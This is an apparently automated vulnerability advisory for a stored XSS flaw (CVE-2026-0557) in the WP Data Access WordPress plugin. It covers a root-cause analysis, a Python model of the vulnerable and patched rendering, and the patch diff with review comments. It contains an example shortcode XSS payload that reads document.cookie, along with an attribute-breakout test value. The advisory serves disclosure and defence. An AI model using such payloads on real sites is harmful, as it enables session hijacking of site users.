Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-0557: WP Data Access <= 5.5.63 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'wpda_app' Shortcode (wp-data-access)

CVE ID: CVE-2026-0557
Severity: Medium (CVSS 6.4)
CWE: 79
Vulnerable Version: 5.5.63
Patched Version: 5.5.64
Disclosed: February 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0557:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the WP Data Access WordPress plugin. It affects the 'wpda_app' shortcode handler and allows authenticated users with contributor privileges or higher to inject scripts into pages. The CVSS score of 6.4 reflects a moderate impact: exploitation requires authenticated access, but the injected script executes persistently.

The root cause is insufficient input sanitization and missing output escaping of user-supplied shortcode attributes in the WPDA_App_Container class. Specifically, the vulnerable code sits in WPDA_App_Container.php at lines 133-148, where the shortcode arguments are processed: the keys and values of the attribute array are joined with implode() and echoed directly into HTML data attributes, so unsanitized attributes of the 'wpda_app' shortcode reach the page unescaped.

Exploitation requires an authenticated attacker with at least contributor privileges who can create or edit posts/pages containing the 'wpda_app' shortcode. The attacker would craft shortcode attributes containing a JavaScript payload, for example: [wpda_app app_id="1" malicious_attribute="alert(document.cookie)"]. When the page renders, the plugin processes these attributes and outputs them without escaping, so the script executes in victims' browsers.

The patch adds comprehensive sanitization in WPDA_App_Container.php lines 133-148. The fix introduces multiple sanitization layers: WPDA_API_Core::sanitize_db_identifier() for field names, sanitize_text_field() for values, wp_strip_all_tags() to remove HTML, and str_replace() to strip dangerous characters including quotes, backticks, angle brackets, and equals signs. Finally, esc_attr() ensures proper HTML attribute escaping before output. This multi-layered approach neutralizes XSS payloads while preserving legitimate shortcode functionality.
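The rendering logic described above and its fix, modelled in Python as an added example (this is not the plugin's PHP code): the WordPress helpers sanitize_text_field(), wp_strip_all_tags(), esc_attr() and WPDA_API_Core::sanitize_db_identifier() are approximated, and the shortcode arguments and the breakout check are constructed for the demonstration.

```python
import html
import re

# Constructed shortcode arguments: the second value closes the attribute
# early, which is exactly what the unescaped implode() output allowed.
SAMPLE_ARGS = {"app_id": "1", "field": 'x" data-injected="y'}

# A well-formed rendering carries exactly two name="..." pairs.
ATTR_RE = re.compile(r'\s([\w:-]+)="')


def _emit(names: str, values: str) -> str:
    # The two data attributes WPDA_App_Container writes into its <div>.
    return (f'data-shortcode_field_name="{names}" '
            f'data-shortcode_field_value="{values}"')


def render_attrs_vulnerable(args: dict) -> str:
    """Pre-5.5.64 logic: implode() of raw keys and values straight into
    double-quoted attributes, with no escaping at all."""
    return _emit(",".join(args.keys()), ",".join(args.values()))


def sanitize_identifier(key: str) -> str:
    """Stand-in for WPDA_API_Core::sanitize_db_identifier() (assumed
    behaviour: keep only characters valid in an unquoted identifier)."""
    return re.sub(r"[^A-Za-z0-9_]", "", key)


def sanitize_value(value: str) -> str:
    """Approximation of the patched per-value chain: strip tags
    (wp_strip_all_tags), drop quotes/backticks/angle brackets/'='
    (the str_replace layers) and normalise whitespace (part of what
    sanitize_text_field does)."""
    value = re.sub(r"<[^>]*>", "", value)
    for ch in "\"'`<>=":
        value = value.replace(ch, "")
    return " ".join(value.split())


def render_attrs_escape_only(args: dict) -> str:
    """Only the esc_attr() layer: HTML-escape, quotes included, at output
    time. This layer on its own is what closes the attribute injection."""
    return _emit(html.escape(",".join(args.keys()), quote=True),
                 html.escape(",".join(args.values()), quote=True))


def render_attrs_patched(args: dict) -> str:
    """Patched logic: per-item sanitisation, then esc_attr() on the joined
    strings when they are echoed."""
    names = ",".join(sanitize_identifier(k) for k in args)
    values = ",".join(sanitize_value(v) for v in args.values())
    return _emit(html.escape(names, quote=True),
                 html.escape(values, quote=True))


def attribute_breakout(rendered: str) -> bool:
    """Constructed check: any attribute beyond the expected two means a
    value terminated its attribute early (an injection succeeded)."""
    return len(ATTR_RE.findall(" " + rendered)) != 2


if __name__ == "__main__":
    for fn in (render_attrs_vulnerable, render_attrs_escape_only,
               render_attrs_patched):
        out = fn(SAMPLE_ARGS)
        print(f"{fn.__name__}: breakout={attribute_breakout(out)}\n  {out}")
```

Running it shows that escaping at output is sufficient to neutralise the breakout, while the character stripping adds defence in depth at the cost of silently altering legitimate values containing quotes or `=`.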

Successful exploitation allows attackers to inject arbitrary JavaScript that executes whenever users view the compromised page. This enables session hijacking, administrative actions through forged requests, content defacement, and malware distribution. The stored nature means the payload persists across sessions and affects all users viewing the page, including administrators.

Differential between vulnerable and patched code

Code Diff
--- a/wp-data-access/WPDataAccess/API/WPDA_API.php
+++ b/wp-data-access/WPDataAccess/API/WPDA_API.php
@@ -27,8 +27,7 @@

 					if (
                         '/' . self::WPDA_NAMESPACE === $rest_route &&
-                        ! current_user_can( 'manage_options' ) &&
-                        ! current_user_can( 'manage_sites' )
+                        ! WPDA::current_user_is_admin()
                     ) {
 						return new WP_Error(
 							'rest_cannot_access',
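Review bot: the replaced condition denied the route only to users lacking both `manage_options` and `manage_sites`; `WPDA::current_user_is_admin()`, as defined in the WPDA.php hunk of this diff, checks `manage_options` or `is_super_admin()`, so a user holding only `manage_sites` without being a super admin now loses access to the `WPDA_NAMESPACE` REST route. Confirm that narrowing is intended, and add a short comment above the `if` naming the access rule so it can be read without following the helper.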
--- a/wp-data-access/WPDataAccess/API/WPDA_Apps.php
+++ b/wp-data-access/WPDataAccess/API/WPDA_Apps.php
@@ -1697,7 +1697,7 @@
         $map,
         $theme
     ) {
-        if ( 1 > $app_id || 1 > $cnt_id || 'table' !== $target && 'form' !== $target && 'rform' !== $target && 'theme' !== $target && 'chart' !== $target && 'map' !== $target ) {
+        if ( 1 > $app_id || 1 > $cnt_id || 'table' !== $target && 'form' !== $target && 'rform' !== $target && 'theme' !== $target && 'chart' !== $target && 'map' !== $target && 'dashboard' !== $target ) {
             return $this->bad_request();
         }
         if ( null === $settings || '' === $settings ) {
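Review bot: the `if` mixes `||` and `&&` in one chain and relies on `&&` binding tighter than `||`; with `'dashboard'` now the seventh target the condition is hard to verify by eye. Suggest `( 1 > $app_id || 1 > $cnt_id || ! in_array( $target, array( 'table', 'form', 'rform', 'theme', 'chart', 'map', 'dashboard' ), true ) )`, which also keeps the strict string comparison.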
@@ -1743,6 +1743,14 @@
                         ));
                     }
                     break;
+                case 'dashboard':
+                    $error_msg = WPDA_App_Container_Model::update_dashboard_settings( $app_id, null );
+                    if ( '' !== $error_msg ) {
+                        return new WP_Error('error', $error_msg, array(
+                            'status' => 403,
+                        ));
+                    }
+                    break;
                 default:
                     return $this->bad_request();
             }
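Review bot: the new `'dashboard'` case maps a non-empty `$error_msg` from `update_dashboard_settings()` to `'status' => 403`, but that message is `$wpdb->last_error`, a database failure rather than an authorization failure, so 500 describes it accurately. The neighbouring cases visible above use the same mapping, so either change them together or add a comment explaining why a DB error is reported as forbidden.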
@@ -1806,6 +1814,15 @@
                                     'status' => 403,
                                 ));
                             }
+                        } else {
+                            if ( 'dashboard' === $target ) {
+                                $error_msg = WPDA_App_Container_Model::update_dashboard_settings( $cnt_id, $settings );
+                                if ( '' !== $error_msg ) {
+                                    return new WP_Error('error', $error_msg, array(
+                                        'status' => 403,
+                                    ));
+                                }
+                            }
                         }
                     }
                 }
--- a/wp-data-access/WPDataAccess/API/WPDA_Table.php
+++ b/wp-data-access/WPDataAccess/API/WPDA_Table.php
@@ -1205,7 +1205,7 @@
     }

     private function get_table_access( $dbs, $tbl ) {
-        if ( current_user_can( 'manage_options' ) ) {
+        if ( WPDA::current_user_is_admin() ) {
             // Check administrator rights
             if ( is_admin() ) {
                 $access = WPDA_Dictionary_Access::check_table_access_backend( $dbs, $tbl, $done );
--- a/wp-data-access/WPDataAccess/Dashboard/WPDA_Dashboard.php
+++ b/wp-data-access/WPDataAccess/Dashboard/WPDA_Dashboard.php
@@ -332,13 +332,13 @@
      * @return string
      */
     protected function get_help_url() {
-        $help_root = 'https://wpdataaccess.com/docs/';
+        $help_url = 'https://docs.wpdataaccess.com/';
         if ( isset( $_REQUEST['page'] ) ) {
             // phpcs:ignore WordPress.Security.NonceVerification
             switch ( $_REQUEST['page'] ) {
                 // phpcs:ignore WordPress.Security.NonceVerification
                 case WP_Data_Access_Admin::PAGE_MAIN:
-                    $help_url = $help_root . 'data-explorer/data-explorer-getting-started/';
+                    $help_url = 'https://docs.legacy.wpdataaccess.com/docs/data-explorer-getting-started/';
                     break;
                 case WP_Data_Access_Admin::PAGE_APPS:
                     $help_url = 'https://docs.rad.wpdataaccess.com/';
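Review bot: `$help_root` is removed here and `$help_url` is now initialised at the top of the function; the later hunk in this file deletes the `default:` fallbacks on the strength of that initialisation. Lines 359-423 of the file are not part of this diff, so confirm no remaining `$help_root` reference exists there, since a leftover use would raise an undefined-variable notice and produce a broken help link.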
@@ -347,22 +347,22 @@
                     $help_url = 'https://docs.sql.wpdataaccess.com/';
                     break;
                 case WP_Data_Access_Admin::PAGE_DESIGNER:
-                    $help_url = $help_root . 'data-designer/data-designer-getting-started/';
+                    $help_url = 'https://docs.legacy.wpdataaccess.com/docs/data-designer-getting-started/';
                     break;
                 case WP_Data_Access_Admin::PAGE_PUBLISHER:
-                    $help_url = $help_root . 'data-tables/data-tables-getting-started/';
+                    $help_url = 'https://docs.legacy.wpdataaccess.com/docs/data-tables-getting-started/';
                     break;
                 case WP_Data_Access_Admin::PAGE_DASHBOARD:
-                    $help_url = $help_root . 'dashboards-and-widgets/bi-getting-started/';
+                    $help_url = 'https://docs.legacy.wpdataaccess.com/docs/bi-getting-started/';
                     break;
                 case WP_Data_Access_Admin::PAGE_CHARTS:
-                    $help_url = $help_root . 'charts-legacy/chart-widgets/';
+                    $help_url = 'https://docs.legacy.wpdataaccess.com/docs/chart-widgets/';
                     break;
                 case WPDP::PAGE_MAIN:
-                    $help_url = $help_root . 'data-forms/data-projects/';
+                    $help_url = 'https://docs.legacy.wpdataaccess.com/docs/data-projects/';
                     break;
                 case WPDP::PAGE_TEMPLATES:
-                    $help_url = $help_root . 'templates/project-templates/';
+                    $help_url = 'https://docs.legacy.wpdataaccess.com/docs/project-templates/';
                     break;
                 case 'wpdataaccess':
                     $current_tab = ( isset( $_REQUEST['tab'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['tab'] ) ) : 'plugin' );
@@ -424,15 +424,9 @@
                                     $help_url = 'https://docs.settings.wpdataaccess.com/legacy-tools-plugin.html';
                             }
                             break;
-                        default:
-                            $help_url = 'https://docs.settings.wpdataaccess.com/';
                     }
                     break;
-                default:
-                    $help_url = 'https://docs.wpdataaccess.com/';
             }
-        } else {
-            $help_url = 'https://docs.wpdataaccess.com/';
         }
         return $help_url;
     }
@@ -730,7 +724,7 @@
 						<?php
         }
         ?>
-					<li class="menu-item"><a target="_blank" href="https://wpdataaccess.com/documentation/"><i class="fas fa-question"></i> Online Documentation</a></li>
+					<li class="menu-item"><a target="_blank" href="https://docs.wpdataaccess.com/"><i class="fas fa-question"></i> Online Documentation</a></li>
 					<li class="menu-item"><a target="_blank" href="https://wordpress.org/support/plugin/wp-data-access/"><i class="fas fa-life-ring"></i> Support Forum</a></li>
 					<?php
         ?>
@@ -844,7 +838,7 @@
 							</td>
 							<td style="white-space:nowrap">
 								<a href="https://wpdataaccess.com/pricing/" target="_blank" class="button button-primary">UPGRADE TO PREMIUM</a>
-								<a href="https://wpdataaccess.com/docs/dashboards-and-widgets/bi-getting-started/" target="_blank" class="button">READ MORE</a>
+								<a href="https://docs.legacy.wpdataaccess.com/docs/bi-getting-started/" target="_blank" class="button">READ MORE</a>
 							</td>
 						</tr>
 					</table>
@@ -1105,15 +1099,6 @@
 								<i class="fas fa-toggle-on"></i>
 								<span>Switch to old Data Explorer</span>
 							</a>
-							<span>
-								<a href="https://wpdataaccess.com/2024/01/26/the-new-data-explorer-wp-data-access-5-4-0/"
-								   target="_blank"
-								   class="wpda_tooltip"
-								   title="Click to read more"
-								>
-									<i class="fas fa-circle-info"></i>
-								</a>
-							</span>
 						</span>
 						<?php
         }
@@ -1690,7 +1675,7 @@
 							<?php
         if ( !class_exists( 'Code_Manager\Code_Manager_Model' ) || !class_exists( 'WPDataAccess\Premium\WPDAPRO_Dashboard\WPDAPRO_Widget_Project' ) ) {
             ?>
-								<a href="https://wpdataaccess.com/docs/dashboards-and-widgets/bi-getting-started/" target="_blank">
+								<a href="https://docs.legacy.wpdataaccess.com/docs/bi-getting-started/" target="_blank">
 									<i class="fas fa-question-circle pointer wpda_tooltip"
 									   style="font-size: 170%; vertical-align: middle"
 									   title="Your installation does not support all available widget types! Click to learn how to install more widget types..."></i>
@@ -2277,61 +2262,9 @@
             case 'templates':
             case 'charts':
                 $promotions = array(array(
-                    'This tool will transition to the new App Builder. Please migrate on time.' => array(null, 'fa-lightbulb'),
-                ));
-                break;
-            case 'csv':
-                $promotions = array(array(
-                    'Use the connection wizards for automated CSV synchronization.' => array('https://wpdataaccess.com/docs/remote-data-files/csv-files/', 'fa-lightbulb'),
+                    'This tool will be transitioned to the new App Builder. Please migrate on time.' => array(null, 'fa-lightbulb'),
                 ));
                 break;
-            case 'publisher_OLD':
-                $promotions = array(
-                    array(
-                        'Change data table color, spacing, border radius and modal popup behaviour.' => array('https://wpdataaccess.com/data-tables-styling/premium-styling/', 'fa-palette'),
-                    ),
-                    array(
-                        'Reorder data table elements with drag and drop.' => array('https://wpdataaccess.com/docs/data-tables/extension-manager/', 'fa-star'),
-                    ),
-                    array(
-                        'Add buttons to support CSV, Excel, PDF and SQL downloads.' => array('https://wpdataaccess.com/docs/data-tables/extension-manager/', 'fa-cloud-download'),
-                    ),
-                    array(
-                        'Add user friendly Search Panes to simplify searching.' => array('https://wpdataaccess.com/docs/data-tables-interactive-filters/search-panes/', 'fa-magic'),
-                    ),
-                    array(
-                        'Use the Search Builder to add interactive searching.' => array('https://wpdataaccess.com/docs/data-tables-interactive-filters/search-builder/', 'fa-search'),
-                    ),
-                    array(
-                        'Synchronize your Google Sheets from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-data-files/public-url/#google-sheets', 'fa-database'),
-                    )
-                );
-                break;
-            case 'wpda':
-                $promotions = array(
-                    array(
-                        'Access your SQL Server tables from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-database-connections/sql-server/', 'fa-database'),
-                    ),
-                    array(
-                        'Access your PostgreSQL tables from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-database-connections/postgresql/', 'fa-database'),
-                    ),
-                    array(
-                        'Access your Oracle tables from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-database-connections/oracle/', 'fa-database'),
-                    ),
-                    array(
-                        'Access your remote MariaDB | MySQL tables from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-database-connections/mariadb-mysql/', 'fa-database'),
-                    ),
-                    array(
-                        'Access your CSV files directly from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-data-files/csv-files/', 'fa-lightbulb'),
-                    ),
-                    array(
-                        'Access your MS Access tables from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-data-files/ms-access/', 'fa-database'),
-                    ),
-                    array(
-                        'Synchronize your Google Sheets from the Data Explorer.' => array('https://wpdataaccess.com/docs/remote-data-files/public-url/#google-sheets', 'fa-database'),
-                    )
-                );
-                break;
             default:
                 $promotions = array();
         }
--- a/wp-data-access/WPDataAccess/Data_Apps/WPDA_App_Container.php
+++ b/wp-data-access/WPDataAccess/Data_Apps/WPDA_App_Container.php
@@ -2,6 +2,7 @@

 namespace WPDataAccessData_Apps {

+    use WPDataAccessAPIWPDA_API_Core;
     use WPDataAccessAPIWPDA_Apps;
     use WPDataAccessPlugin_Table_ModelsWPDA_App_Apps_Model;
     use WPDataAccessPlugin_Table_ModelsWPDA_App_Model;
@@ -60,7 +61,7 @@
 					return;
 				}

-				$this->show_feedback( __( 'Invalid app id', 'wp-data-access' ) );
+				$this->show_feedback( __( 'Not authorized', 'wp-data-access' ) );
 				return;
 			}

@@ -111,6 +112,11 @@
                 case '6':
                     // Chart
                     $app_type_class = 'pp-container-chart';
+                    break;
+                case '7':
+                    // Chart
+                    $app_type_class = 'pp-container-dashboard';
+                    break;
             }
 			?>
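Review bot: the comment on the new `case '7':` reads `// Chart` but the branch assigns `pp-container-dashboard`; change it to `// Dashboard`. Adding `break;` to `case '6':` is correct now that it is no longer the last case, otherwise the chart type would fall through into the dashboard class.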

@@ -127,12 +133,25 @@
 						<?php
 					}

-					if ( 0 < count( $this->shortcode_args ) ) {
-						?>
-						data-shortcode_field_name="<?php echo implode( ',', array_keys( $this->shortcode_args ) ); ?>"
-						data-shortcode_field_value="<?php echo implode( ',', array_values( $this->shortcode_args ) ); ?>"
-						<?php
-					}
+                    if ( 0 < count( $this->shortcode_args ) ) {
+                        $field_names  = array();
+                        $field_values = array();
+                        foreach ( $this->shortcode_args as $key => $value ) {
+                            // Sanitize field name
+                            $field_names[] = WPDA_API_Core::sanitize_db_identifier( $key );
+                            // Sanitize field value
+                            $sanitized_value = sanitize_text_field( $value );
+                            $sanitized_value = wp_strip_all_tags( $value );
+                            $sanitized_value = str_replace( array( '"', "'", '`' ), '', $sanitized_value );
+                            $sanitized_value = str_replace( array( '<', '>' ), '', $sanitized_value );
+                            $sanitized_value = str_replace( '=', '', $sanitized_value );
+                            $field_values[] = $sanitized_value;
+                        }
+                        ?>
+                        data-shortcode_field_name="<?php echo esc_attr( implode( ',', $field_names) ); ?>"
+                        data-shortcode_field_value="<?php echo esc_attr( implode( ',', $field_values ) ); ?>"
+                        <?php
+                    }
 					?>
 				></div>
 			</div>
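Review bot: in the value loop, `$sanitized_value = wp_strip_all_tags( $value );` overwrites the result of `sanitize_text_field( $value )` on the preceding line, so the `sanitize_text_field()` layer is discarded; it should read `wp_strip_all_tags( $sanitized_value )`. The output is still protected because `esc_attr()` encodes quotes and angle brackets at the `echo`, which is the layer that actually closes the attribute injection; the `str_replace()` stripping is defence in depth and is lossy, since legitimate values containing `=` or quotes are silently altered. Note also that `,` is not stripped on either side, so a value containing a comma still shifts the alignment between `data-shortcode_field_name` and `data-shortcode_field_value` when the client splits them.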
--- a/wp-data-access/WPDataAccess/Data_Publisher/WPDA_Publisher_Form.php
+++ b/wp-data-access/WPDataAccess/Data_Publisher/WPDA_Publisher_Form.php
@@ -108,7 +108,7 @@
         );
         $this->check_table_type = false;
         $this->title = 'Data Tables';
-        $args['help_url'] = 'https://wpdataaccess.com/docs/data-tables/data-tables-getting-started/';
+        $args['help_url'] = 'https://docs.legacy.wpdataaccess.com/docs/data-tables-getting-started/';
         parent::__construct(
             $schema_name,
             $table_name,
--- a/wp-data-access/WPDataAccess/Design_Table/WPDA_Design_Table_Form.php
+++ b/wp-data-access/WPDataAccess/Design_Table/WPDA_Design_Table_Form.php
@@ -1740,7 +1740,7 @@
 				}
 				?>
 				<div style="text-align:right">
-					<a href="https://wpdataaccess.com/docs/data-designer/data-designer-getting-started/"
+					<a href="https://docs.legacy.wpdataaccess.com/docs/data-designer-getting-started/"
 					   target="_blank" style="text-decoration:none">
 						> What is the difference between a table design and a database table?
 					</a>
--- a/wp-data-access/WPDataAccess/Plugin_Table_Models/WPDA_App_Container_Model.php
+++ b/wp-data-access/WPDataAccess/Plugin_Table_Models/WPDA_App_Container_Model.php
@@ -210,6 +210,16 @@
         return $wpdb->last_error;
     }

+    public static function update_dashboard_settings( $cnt_id, $cnt_dashboard_settings ) {
+        global $wpdb;
+        $wpdb->update( static::get_base_table_name(), array(
+            'cnt_dashboard' => $cnt_dashboard_settings,
+        ), array(
+            'cnt_id' => $cnt_id,
+        ) );
+        return $wpdb->last_error;
+    }
+
     public static function update_map_settings( $cnt_id, $cnt_map_settings ) {
         global $wpdb;
         $wpdb->update( static::get_base_table_name(), array(
--- a/wp-data-access/WPDataAccess/Utilities/WPDA_Add_App_To_Menu.php
+++ b/wp-data-access/WPDataAccess/Utilities/WPDA_Add_App_To_Menu.php
@@ -14,7 +14,6 @@

 		$apps = WPDA_App_Model::add_to_dashboard_menu();
 		foreach ( $apps as $app ) {
-
 			$settings = json_decode( $app['app_settings'], true );
 			if (
 				! isset(
@@ -39,7 +38,24 @@
 			}

 			$title = $settings['settings']['app_menu_title'];
-			if ( is_admin() ) {
+            $icon = 'dashicons-database-view';
+            switch ($app['app_type']) {
+                case 1:
+                case 3:
+                case 4:
+                    $icon = 'dashicons-edit';
+                    break;
+                case 2:
+                    $icon = 'dashicons-location';
+                    break;
+                case 6:
+                    $icon = 'dashicons-chart-bar';
+                    break;
+                case 7:
+                    $icon = 'dashicons-dashboard';
+                    break;
+            }
+            if ( is_admin() ) {
 				// Add app to dashboard menu
 				add_menu_page(
 					$title,
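Review bot: the added `switch` block is indented with spaces while the surrounding lines use tabs, and it compares `$app['app_type']` against integer cases whereas the WPDA_App_Container hunk in this diff switches on the string values `'6'` and `'7'`; PHP's loose `switch` comparison makes both work, but casting once (`switch ( (int) $app['app_type'] )`) would make the intent explicit. Any type not listed (for example 5) silently keeps `dashicons-database-view`, which is fine if deliberate but deserves a comment.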
@@ -47,7 +63,7 @@
 					WPDA::get_current_user_capability(),
 					$title,
 					null,
-					'dashicons-database-view'
+                    $icon
 				);

 				add_submenu_page(
--- a/wp-data-access/WPDataAccess/Utilities/WPDA_Import.php
+++ b/wp-data-access/WPDataAccess/Utilities/WPDA_Import.php
@@ -245,7 +245,7 @@
 							echo __( 'to', 'wp-data-access' );
 							echo ' <strong>';
 							echo __( 'On', 'wp-data-access' );
-							echo '</strong> (<a href="https://wpdataaccess.com/docs/getting-started/known-limitations/">';
+							echo '</strong> (<a href="https://docs.wpdataaccess.com/limitations.html">';
 							echo __( 'see documentation', 'wp-data-access' );
 							echo '</a>).';
 							?>
--- a/wp-data-access/WPDataAccess/Utilities/WPDA_Import_Multi.php
+++ b/wp-data-access/WPDataAccess/Utilities/WPDA_Import_Multi.php
@@ -23,7 +23,7 @@
 	 */
 	class WPDA_Import_Multi {

-		const SOLUTIONS = '(<a href="https://wpdataaccess.com/docs/tool-guide/known-limitations/" target="_blank">see solutions</a>)';
+		const SOLUTIONS = '(<a href="https://docs.wpdataaccess.com/limitations.html" target="_blank">see solutions</a>)';

 		/**
 		 * URL where to post data
@@ -377,7 +377,7 @@
 							echo __( 'to', 'wp-data-access' );
 							echo ' <strong>';
 							echo __( 'On', 'wp-data-access' );
-							echo '</strong> (<a href="https://wpdataaccess.com/docs/tool-guide/known-limitations/">';
+							echo '</strong> (<a href="https://docs.wpdataaccess.com/limitations.html">';
 							echo __( 'see documentation', 'wp-data-access' );
 							echo '</a>).';
 							?>
--- a/wp-data-access/WPDataAccess/Utilities/WPDA_Remote_Database.php
+++ b/wp-data-access/WPDataAccess/Utilities/WPDA_Remote_Database.php
@@ -510,7 +510,7 @@
 			<div class="restyle_link">
 				<strong>NOTE</strong>
 				Please activate your Premium Data Services access <a href="options-general.php?page=wpdataaccess&tab=pds">here</a> to remotely connect to foreign DBMSs and remote files.
-				<a href="https://wpdataaccess.com/docs/remote-connection-wizard/remote-wizard/" class="restyle_link" target="_blank">(read more...)</a>
+				<a href="https://docs.remote.wpdataaccess.com/pds/remote-wizard.html" class="restyle_link" target="_blank">(read more...)</a>
 			</div>
 			<?php
     }
--- a/wp-data-access/WPDataAccess/Utilities/WPDA_Table_Actions.php
+++ b/wp-data-access/WPDataAccess/Utilities/WPDA_Table_Actions.php
@@ -571,7 +571,7 @@
 											<?php
         echo __( 'Table Settings', 'wp-data-access' );
         ?>
-											<a href="https://wpdataaccess.com/docs/data-explorer-settings/manage-table-settings/" target="_blank">
+											<a href="https://docs.legacy.wpdataaccess.com/docs/manage-table-settings/" target="_blank">
 												<span class="dashicons dashicons-editor-help wpda_tooltip"
 													  title="<?php
         echo __( 'Help opens in a new tab or window', 'wp-data-access' );
@@ -855,7 +855,7 @@
 											<?php
         echo __( 'Column Settings', 'wp-data-access' );
         ?>
-											<a href="https://wpdataaccess.com/docs/data-explorer-settings/column-settings/" target="_blank">
+											<a href="https://docs.legacy.wpdataaccess.com/docs/column-settings/" target="_blank">
 												<span class="dashicons dashicons-editor-help wpda_tooltip"
 													  title="<?php
         echo __( 'Help opens in a new tab or window', 'wp-data-access' );
@@ -1205,7 +1205,7 @@
 						<?php
         echo __( 'Dashboard Menus', 'wp-data-access' );
         ?>
-						<a href="https://wpdataaccess.com/docs/data-explorer-settings/dashboard-menus/" target="_blank">
+						<a href="https://docs.legacy.wpdataaccess.com/docs/dashboard-menus/" target="_blank">
 							<span class="dashicons dashicons-editor-help wpda_tooltip"
 								  title="<?php
         echo sprintf( __( 'Help opens in a new tab or window', 'wp-data-access' ), esc_attr( $this->table_name ) );
@@ -1418,7 +1418,7 @@
 						<?php
         echo __( 'Dynamic Hyperlinks', 'wp-data-access' );
         ?>
-						<a href="https://wpdataaccess.com/docs/data-explorer-settings/dynamic-hyperlinks/" target="_blank">
+						<a href="https://docs.legacy.wpdataaccess.com/docs/dynamic-hyperlinks/" target="_blank">
 							<span class="dashicons dashicons-editor-help wpda_tooltip"
 								  title="<?php
         echo sprintf( __( 'Help opens in a new tab or window', 'wp-data-access' ), esc_attr( $this->table_name ) );
--- a/wp-data-access/WPDataAccess/WPDA.php
+++ b/wp-data-access/WPDataAccess/WPDA.php
@@ -51,8 +51,8 @@
 		/**
 		 * Option wpda_version and it's default value
 		 */
-		const OPTION_WPDA_VERSION         = array( 'wpda_version', '5.5.63' );
-		const OPTION_WPDA_CLIENT_VERSION  = array( 'wpda_client_version', '1.0.63' );
+		const OPTION_WPDA_VERSION         = array( 'wpda_version', '5.5.64' );
+		const OPTION_WPDA_CLIENT_VERSION  = array( 'wpda_client_version', '1.0.64' );
 		const OPTION_WPDA_UPGRADED        = array( 'wpda_upgraded', false );
 		/**
 		 * Option wpda_setup_error and it's default value
@@ -1387,7 +1387,7 @@
 		public static function validate_name_failed() {
 			$title   = __( 'Schema, table or column name(s) restricting plugin features (click to read more and fix)', 'wp-data-access' );
 			$warning = "
-				<a href='https://wpdataaccess.com/docs/data-explorer/naming-conventions/' target='_blank' style='text-decoration:none'>
+				<a href='https://docs.legacy.wpdataaccess.com/docs/naming-conventions/' target='_blank' style='text-decoration:none'>
 					<span class='dashicons dashicons-flag wpda_tooltip' style='color:red;padding-left:5px' title='$title'></span>
 				</a>";
 			return $warning;
@@ -1396,7 +1396,7 @@
 		public static function validate_name_np() {
 			$title   = __( 'Schema, table or column name validation not possible (click to read more and fix)', 'wp-data-access' );
 			$warning = "
-				<a href='https://wpdataaccess.com/docs/data-explorer/naming-conventions/' target='_blank'>
+				<a href='https://docs.legacy.wpdataaccess.com/docs/naming-conventions/' target='_blank'>
 					<span class='dashicons dashicons-warning wpda_tooltip' style='padding-left:5px' title='$title'></span>
 				</a>";
 			return $warning;
@@ -1684,7 +1684,7 @@
 		}

         public static function current_user_is_admin() {
-            return current_user_can( 'manage_options' );
+            return current_user_can( 'manage_options' ) || is_super_admin();
         }

 	}
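Review bot: on a non-multisite install `is_super_admin()` returns true for any user holding the `delete_users` capability, so `current_user_is_admin()` now treats such users as plugin administrators even without `manage_options`; on multisite it returns true for network super admins. If only the multisite case is intended, guard it: `current_user_can( 'manage_options' ) || ( is_multisite() && is_super_admin() )`.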
--- a/wp-data-access/WPDataAccess/WPDA_Navi/WPDA_Navi.php
+++ b/wp-data-access/WPDataAccess/WPDA_Navi/WPDA_Navi.php
@@ -198,7 +198,7 @@
                                 A data-driven Rapid Application Development tool.
                             </span>

-                            <a href="https://wpdataaccess.com/docs/app-builder/road-map/" target="_blank" class="roadmap">ROAD MAP</a>
+                            <span></span>
 						</div>

 						<div class="wpda-navi-container-content-item-content">
@@ -214,11 +214,11 @@

 						<div class="wpda-navi-container-content-item-facts">
 							<ul>
-								<li>Intuitive Table Builder for creating data tables with ease.</li>
-								<li>Highly customizable Form Builder for designing data entry forms.</li>
-								<li>Integrated Theme Builder to personalize app styling.</li>
-								<li>Interactive Chart Builder for real-time data analysis.</li>
-                                <li>Visualize location data from SQL queries with the Map Builder.</li>
+								<li>Intuitive <strong>Table Builder</strong> for creating data tables with ease.</li>
+								<li>Highly customizable <strong>Form Builder</strong> for designing data entry forms.</li>
+								<li>Integrated <strong>Theme Builder</strong> to personalize app styling.</li>
+								<li>Interactive <strong>Chart Builder</strong> for real-time data analysis.</li>
+                                <li>Visualize location data from SQL queries with the <strong>Map Builder</strong>.</li>
 							</ul>
 						</div>
 					</div>
@@ -229,7 +229,7 @@
 							<h3>Explorer</h3>
 							<div class="wpda-navi-container-content-item-title-help">
 								<a
-										href="https://wpdataaccess.com/docs/data-explorer/data-explorer-getting-started/"
+										href="https://docs.legacy.wpdataaccess.com/docs/data-explorer-getting-started/"
 										target="_blank"
 										class="wpda_tooltip"
 										title="View online documentation"
@@ -353,21 +353,14 @@
                                     </a>
                                 </li>
                                 <li>
-                                    <span class="wpda-new">
-                                        Get help directly from within all builders.
-                                    </span>
+                                    Images and hyperlinks are now displayed in PDF exports.
                                 </li>
                                 <li>
-                                    Automate your data exports (new Data Explorer only).
+                                    Media type configuration within the Table and Form Builder.
                                 </li>
                                 <li>
-                                    <a href="https://docs.rad.wpdataaccess.com/map-builder/" target="_blank" class="whatsnew">
-                                        Display geographic data on interactive maps using SQL queries.
-                                    </a>
-                                </li>
-                                <li>
-                                    <a href="https://docs.rad.wpdataaccess.com/hooks/" target="_blank" class="whatsnew">
-                                        Extended Hooks for Tables and Forms.
+                                    <a href="https://docs.rad.wpdataaccess.com/app-manager/running-apps/shortcodes/shortcode-usage.html#%E2%9C%A8-start-in-full-screen-mode" target="_blank" class="whatsnew">
+                                        Start all app types (except maps) in full-screen mode.
                                     </a>
                                 </li>
 							</ul>
@@ -442,35 +435,19 @@
 							</span>
 						</button>

-						<button
